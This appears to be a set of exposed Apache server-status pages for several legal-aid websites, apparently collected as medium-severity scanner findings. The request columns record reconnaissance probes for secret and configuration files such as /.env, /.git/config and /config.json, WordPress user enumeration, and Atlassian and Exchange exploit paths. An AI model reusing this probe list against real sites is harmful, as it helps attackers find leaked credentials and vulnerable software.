Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:01:00 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 17 minutes 19 seconds Server load: 0.05 0.03 0.00 Total accesses: 5116572 - Total Traffic: 242.0 GB CPU Usage: u45.39 s4.53 cu0 cs0 - .000504% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 15 requests currently being processed, 0 idle workers KKKKKKKKWSK......K.K.........K.......K.K........................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114202723/4/315809K 0.00013.70.1215274.51 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 1-114200041/17/307275K 1.02101.30.5315603.82 130.176.208.138http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-114202773/4/296193K 0.00003.80.2414399.43 130.176.208.180http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 3-114202783/4/291715K 0.00004.20.0114074.46 130.176.208.180http/1.1picturingjustice.org:8080GET /debug/default/view?panel=config HTTP/1.1 4-114202876/7/280062K 0.00007.20.0214108.08 130.176.208.180http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 5-114202885/6/270945K 0.00006.40.0913303.77 130.176.208.180http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 6-114202935/6/257839K 0.00006.30.0112980.14 130.176.208.180http/1.1picturingjustice.org:8080GET /v2/_catalog HTTP/1.1 7-114203473/3/249535K 0.00003.60.0012283.02 130.176.208.180http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 8-114203520/0/236963W 0.00000.00.0011522.01 130.176.208.180http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 9-114203530/0/226031S 1.99200.00.0011118.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-114200191/14/214597K 1.73241005.61.3110231.65 64.252.66.97http/1.1gwinnettfamilylawclinic.org:808GET /wp-content/uploads/2015/12/Legitimation-Answer-and-counter 11-114-0/0/192012. 0.001100.00.009331.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-114-0/0/176702. 0.001000.00.008770.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-114-0/0/168042. 0.00900.00.008058.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-114-0/0/156059. 0.00800.00.007530.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-114-0/0/149531. 1.26100.00.007254.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-114-0/0/134158. 0.00600.00.006324.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-114196104/65/112395K 7.15004.91.655336.07 130.176.208.180http/1.1picturingjustice.org:8080GET /api/search?folderIds=0 HTTP/1.1 18-114-0/0/103344. 0.00700.00.005128.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-114199131/36/93802K 2.62101.52.474748.56 130.176.137.155http/1.1picturingjustice.org:8080GET / HTTP/1.1 20-114-0/0/93894. 0.00500.00.004523.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-114-0/0/86182. 0.00400.00.004051.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-114-0/0/84812. 0.0050900.00.004104.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-114-0/0/79163. 0.0048200.00.003708.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-114-0/0/71763. 0.0050800.00.003443.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-114-0/0/38018. 0.0050700.00.001723.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-114-0/0/30098. 0.0050600.00.001388.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-114-0/0/27627. 0.0050400.00.001253.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-114-0/0/25398. 0.0050500.00.001161.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-114200921/14/23699K 1.3132632.20.381034.21 15.158.50.39http/1.1atlantalegalaid.org:8080GET /wp-sitemap.xml HTTP/1.1 30-114-0/0/25337. 0.0050300.00.001138.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-114-0/0/23296. 0.0050200.00.001016.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-114-0/0/24119. 0.0050100.00.001138.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-114-0/0/23752. 0.0050000.00.001123.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-114-0/0/24926. 0.0049900.00.001086.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-114-0/0/26401. 0.0049800.00.001148.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-114-0/0/22938. 0.0049700.00.001008.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-114201327/31/23489K 1.93009.01.911057.30 130.176.208.180http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 38-114-0/0/23012. 0.0049600.00.001015.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-114201383/16/22427K 1.55007.10.43936.86 130.176.208.180http/1.1picturingjustice.org:8080GET /about HTTP/1.1 40-114-0/0/23681. 0.0049500.00.00997.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-114-0/0/4955. 0.00476600.00.00210.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-114-0/0/2819. 0.00476500.00.00108.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-114-0/0/3161. 0.00476400.00.00137.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-114-0/0/1981. 0.00476300.00.00129.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-114-0/0/1924. 0.00476200.00.0095.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-114-0/0/1810. 0.00476100.00.0048.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-114-0/0/1933. 0.00476000.00.0084.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-114-0/0/1560. 0.00475900.00.0052.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-114-0/0/1456. 0.00475800.00.0055.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-114-0/0/1286. 0.00475700.00.0057.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-114-0/0/1480. 0.00475600.00.0057.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-114-0/0/1865. 0.00475500.00.0051.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-114-0/0/1207. 0.00475400.00.0043.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-113-0/0/1384. 0.006361500.00.0062.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-113-0/0/1097. 0.006361200.00.0051.37 ::1http/1.1atlantalegalaid.org:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97913beeec4
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:06:18 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 37 seconds Server load: 6.38 1.80 0.61 Total accesses: 2348585 - Total Traffic: 111.6 GB CPU Usage: u70.18 s10.04 cu0 cs0 - .0017% CPU load .497 requests/sec - 24.8 kB/second - 49.8 kB/request 53 requests currently being processed, 78 idle workers ______._____K____K_KKKK.K___._____._.K__._K_KK__.__K_KKW___K.___ K__._K___K_KK_KKKK____K_KKK.KK_K____.K.K__CKK.__K.K..K_.KK___K._ ____K.__K_K_KK__KKKKK_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-54284390/13/149116_ 1.121210460.00.117129.90 70.132.63.132http/1.1survey.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 1-54282740/24/146313_ 0.721300.00.487406.39 70.132.63.132http/1.1survey.alas.org:8080GET /.env HTTP/1.1 2-54282790/22/138690_ 2.381300.00.406786.84 70.132.63.132http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 3-54284440/4/138060_ 1.0632550.00.116843.78 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 4-54284510/6/132815_ 1.271211170.00.276872.45 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 5-54277790/79/127554_ 6.3833710.02.146306.05 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 6-54-0/0/123208. 1.97400.00.006154.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-54279600/56/116764_ 5.531500.01.125991.82 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 8-54284280/8/111212_ 2.491516310.00.055413.82 70.132.63.80http/1.1survey.alas.org:8080GET / HTTP/1.1 9-54284520/10/109801_ 1.281531480.00.145360.55 204.246.166.105http/1.1intranet.alas.org:8080GET / HTTP/1.1 10-54284610/7/103120_ 1.2501260.00.174844.88 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 11-54284620/8/90827_ 0.54114790.00.084417.14 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 12-54284632/8/81752K 0.74006.00.084061.28 70.132.63.132http/1.1picturingjustice.org:8080GET /s/31332e3232342e3138392e3236/_/;/META-INF/maven/com.atlass 13-54283940/11/76026_ 1.291211000.00.033612.15 70.132.63.132http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 14-54277900/76/71386_ 6.941534090.03.333478.01 204.246.166.105http/1.1events.alas.org:8080GET / HTTP/1.1 15-54284640/12/68080_ 0.4515250.00.083513.42 130.176.211.201http/1.1atlantalegalaid.org:8080HEAD / HTTP/1.1 16-54284810/3/58814_ 1.311557520.00.122692.91 70.132.63.165http/1.1events.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 17-54283055/20/48137K 1.980089.90.552319.88 70.132.63.132http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 18-54284820/3/44103_ 0.55131330.00.002305.00 204.246.166.105http/1.1esign.alas.org:8080GET / HTTP/1.1 19-54284832/6/40560K 1.251615.90.221989.78 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 20-54284881/4/41159K 0.5731633.00.012010.74 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 21-54284894/12/35254K 0.35346165.80.171734.06 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 22-54284902/5/38399K 0.591757.80.011750.95 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 23-54-0/0/34537. 1.32100.00.001616.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-54284921/8/31223K 0.682934.90.061522.01 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-54285210/8/16890_ 0.101460.00.05728.46 70.132.63.132http/1.1secure.alas.org:8080GET / HTTP/1.1 26-54285220/9/11333_ 0.101300.00.05570.89 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 27-54285230/8/11706_ 0.101212810.00.01472.33 70.132.63.132http/1.1survey.alas.org:8080GET /info.php HTTP/1.1 28-54-0/0/9877. 0.531400.00.00430.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-54285250/5/9780_ 0.241400.00.04403.59 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 30-54285260/5/10667_ 0.311300.00.05492.76 70.132.63.132http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 31-54285270/4/9053_ 0.331300.00.08376.45 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 32-54285280/5/10172_ 0.1535210.00.09452.37 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 33-54285330/3/10594_ 1.011519470.00.00457.74 130.176.17.72http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1660781161.01912903785705566406 34-54-0/0/10174. 0.541300.00.00466.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-54285590/2/10774_ 0.58123260.00.03445.11 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808POST /wp-login.php HTTP/1.1 36-54-0/0/9041. 0.531700.00.00379.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-54285693/5/10091K 0.72007.50.01404.91 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 38-54285700/3/8217_ 0.6433900.00.15401.63 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 39-54285910/2/9920_ 0.551300.00.02383.62 204.246.166.105http/1.1short.alas.org:8080GET / HTTP/1.1 40-54-0/0/10176. 0.27300.00.00360.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-54286010/7/2156_ 0.4101330.00.2678.92 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 42-54286025/6/1048K 0.640087.90.0940.33 70.132.63.132http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 43-54286030/5/1039_ 0.281300.00.0545.03 204.246.166.105http/1.1on.alas.org:8080GET / HTTP/1.1 44-54286043/4/635K 0.60007.50.0371.16 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 45-54286055/6/993L 0.640090.40.0953.02 70.132.63.132http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 46-54286060/3/685_ 0.6633230.00.1517.30 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 47-54286070/4/1013_ 0.161210340.00.0546.81 70.132.63.132http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 48-54-0/0/688. 0.401500.00.0020.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-54286090/5/699_ 0.191211770.00.0521.45 70.132.63.132http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 50-54286100/8/631_ 0.081211130.00.0128.45 70.132.63.132http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 51-54286431/4/742K 0.66011.50.1127.37 15.158.43.200http/1.1picturingjustice.org:8080GET / HTTP/1.1 52-54286480/6/685_ 0.13114580.00.0421.08 70.132.63.132http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 53-54286491/8/502K 0.0731382.90.0120.15 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 54-54
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd9794394c423
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:06:18 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 37 seconds Server load: 6.38 1.80 0.61 Total accesses: 2348576 - Total Traffic: 111.6 GB CPU Usage: u70.17 s10.04 cu0 cs0 - .0017% CPU load .497 requests/sec - 24.8 kB/second - 49.8 kB/request 53 requests currently being processed, 78 idle workers ______._____K____K_KKKK.K___._____._.K__._K_KK__.__K_KKK___K.___ K__._K___K_KK_WKKK____K_KKK.KK_K____.K.K__CKK.__K.K..K_.KK___K._ ____K.__K_K_KK__KKKKK_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-54284390/13/149116_ 1.121210460.00.117129.90 70.132.63.132http/1.1survey.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 1-54282740/24/146313_ 0.721300.00.487406.39 70.132.63.132http/1.1survey.alas.org:8080GET /.env HTTP/1.1 2-54282790/22/138690_ 2.381300.00.406786.84 70.132.63.132http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 3-54284440/4/138060_ 1.0632550.00.116843.78 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 4-54284510/6/132815_ 1.271211170.00.276872.45 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 5-54277790/79/127554_ 6.3823710.02.146306.05 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 6-54-0/0/123208. 1.97400.00.006154.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-54279600/56/116764_ 5.531500.01.125991.82 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 8-54284280/8/111212_ 2.491516310.00.055413.82 70.132.63.80http/1.1survey.alas.org:8080GET / HTTP/1.1 9-54284520/10/109801_ 1.281531480.00.145360.55 204.246.166.105http/1.1intranet.alas.org:8080GET / HTTP/1.1 10-54284610/7/103120_ 1.2501260.00.174844.88 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 11-54284620/8/90827_ 0.54114790.00.084417.14 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 12-54284632/8/81752K 0.74006.00.084061.28 70.132.63.132http/1.1picturingjustice.org:8080GET /s/31332e3232342e3138392e3236/_/;/META-INF/maven/com.atlass 13-54283940/11/76026_ 1.291211000.00.033612.15 70.132.63.132http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 14-54277900/76/71386_ 6.941534090.03.333478.01 204.246.166.105http/1.1events.alas.org:8080GET / HTTP/1.1 15-54284640/12/68080_ 0.4515250.00.083513.42 130.176.211.201http/1.1atlantalegalaid.org:8080HEAD / HTTP/1.1 16-54284810/3/58814_ 1.311557520.00.122692.91 70.132.63.165http/1.1events.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 17-54283054/19/48136K 1.9817788.80.552319.88 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 18-54284820/3/44103_ 0.55131330.00.002305.00 204.246.166.105http/1.1esign.alas.org:8080GET / HTTP/1.1 19-54284832/6/40560K 1.250615.90.221989.78 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 20-54284881/4/41159K 0.5731633.00.012010.74 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 21-54284894/12/35254K 0.35246165.80.171734.06 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 22-54284902/5/38399K 0.591757.80.011750.95 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 23-54-0/0/34537. 1.32100.00.001616.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-54284921/8/31223K 0.681934.90.061522.01 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-54285210/8/16890_ 0.101460.00.05728.46 70.132.63.132http/1.1secure.alas.org:8080GET / HTTP/1.1 26-54285220/9/11333_ 0.101300.00.05570.89 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 27-54285230/8/11706_ 0.101212810.00.01472.33 70.132.63.132http/1.1survey.alas.org:8080GET /info.php HTTP/1.1 28-54-0/0/9877. 0.531400.00.00430.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-54285250/5/9780_ 0.241400.00.04403.59 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 30-54285260/5/10667_ 0.311300.00.05492.76 70.132.63.132http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 31-54285270/4/9053_ 0.331300.00.08376.45 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 32-54285280/5/10172_ 0.1535210.00.09452.37 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 33-54285330/3/10594_ 1.011519470.00.00457.74 130.176.17.72http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1660781161.01912903785705566406 34-54-0/0/10174. 0.541300.00.00466.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-54285590/2/10774_ 0.58123260.00.03445.11 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808POST /wp-login.php HTTP/1.1 36-54-0/0/9041. 0.531700.00.00379.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-54285692/4/10090K 0.723656.00.01404.91 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 38-54285700/3/8217_ 0.6433900.00.15401.63 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 39-54285910/2/9920_ 0.551300.00.02383.62 204.246.166.105http/1.1short.alas.org:8080GET / HTTP/1.1 40-54-0/0/10176. 0.27300.00.00360.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-54286010/7/2156_ 0.4101330.00.2678.92 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 42-54286024/5/1047K 0.6416586.90.0940.33 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 43-54286030/5/1039_ 0.281300.00.0545.03 204.246.166.105http/1.1on.alas.org:8080GET / HTTP/1.1 44-54286043/4/635K 0.60007.50.0371.16 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 45-54286055/6/993K 0.640090.40.0953.02 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 46-54286060/3/685_ 0.6633230.00.1517.30 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 47-54286070/4/1013_ 0.161210340.00.0546.81 70.132.63.132http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 48-54-0/0/688. 0.401500.00.0020.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-54286090/5/699_ 0.191211770.00.0521.45 70.132.63.132http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 50-54286100/8/631_ 0.081211130.00.0128.45 70.132.63.132http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 51-54286431/4/742K 0.66011.50.1127.37 15.158.43.200http/1.1picturingjustice.org:8080GET / HTTP/1.1 52-54286480/6/685_ 0.13114580.00.0421.08 70.132.63.132http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 53-54286491/8/502K 0.0731382.90.0120.15 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd9798ad1aba7
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:06:18 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 37 seconds Server load: 6.38 1.80 0.61 Total accesses: 2348596 - Total Traffic: 111.6 GB CPU Usage: u70.18 s10.04 cu0 cs0 - .0017% CPU load .497 requests/sec - 24.8 kB/second - 49.8 kB/request 53 requests currently being processed, 78 idle workers ______._____K____K_KKKK.K___._____._.K__._K_KK__.__K_KKK___K.___ K__._K___W_KK_KKKK____K_KKK.KK_K____.K.K__CKK.__K.K..K_.KK___K._ ____K.__K_K_KK__KKKKK_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-54284390/13/149116_ 1.121210460.00.117129.90 70.132.63.132http/1.1survey.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 1-54282740/24/146313_ 0.721300.00.487406.39 70.132.63.132http/1.1survey.alas.org:8080GET /.env HTTP/1.1 2-54282790/22/138690_ 2.381300.00.406786.84 70.132.63.132http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 3-54284440/4/138060_ 1.0632550.00.116843.78 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 4-54284510/6/132815_ 1.271211170.00.276872.45 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 5-54277790/79/127554_ 6.3833710.02.146306.05 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 6-54-0/0/123208. 1.97400.00.006154.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-54279600/56/116764_ 5.531500.01.125991.82 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 8-54284280/8/111212_ 2.491516310.00.055413.82 70.132.63.80http/1.1survey.alas.org:8080GET / HTTP/1.1 9-54284520/10/109801_ 1.281531480.00.145360.55 204.246.166.105http/1.1intranet.alas.org:8080GET / HTTP/1.1 10-54284610/7/103120_ 1.2501260.00.174844.88 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 11-54284620/8/90827_ 0.54114790.00.084417.14 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 12-54284632/8/81752K 0.74006.00.084061.28 70.132.63.132http/1.1picturingjustice.org:8080GET /s/31332e3232342e3138392e3236/_/;/META-INF/maven/com.atlass 13-54283940/11/76026_ 1.291211000.00.033612.15 70.132.63.132http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 14-54277900/76/71386_ 6.941534090.03.333478.01 204.246.166.105http/1.1events.alas.org:8080GET / HTTP/1.1 15-54284640/12/68080_ 0.4515250.00.083513.42 130.176.211.201http/1.1atlantalegalaid.org:8080HEAD / HTTP/1.1 16-54284810/3/58814_ 1.311557520.00.122692.91 70.132.63.165http/1.1events.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 17-54283055/20/48137K 1.980089.90.552319.88 70.132.63.132http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 18-54284820/3/44103_ 0.55131330.00.002305.00 204.246.166.105http/1.1esign.alas.org:8080GET / HTTP/1.1 19-54284832/6/40560K 1.251615.90.221989.78 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 20-54284881/4/41159K 0.5731633.00.012010.74 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 21-54284895/13/35255K 0.3500166.90.171734.06 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 22-54284902/5/38399K 0.591757.80.011750.95 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 23-54-0/0/34537. 1.32100.00.001616.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-54284921/8/31223K 0.682934.90.061522.01 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-54285210/8/16890_ 0.101460.00.05728.46 70.132.63.132http/1.1secure.alas.org:8080GET / HTTP/1.1 26-54285220/9/11333_ 0.101300.00.05570.89 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 27-54285230/8/11706_ 0.101212810.00.01472.33 70.132.63.132http/1.1survey.alas.org:8080GET /info.php HTTP/1.1 28-54-0/0/9877. 0.531400.00.00430.06 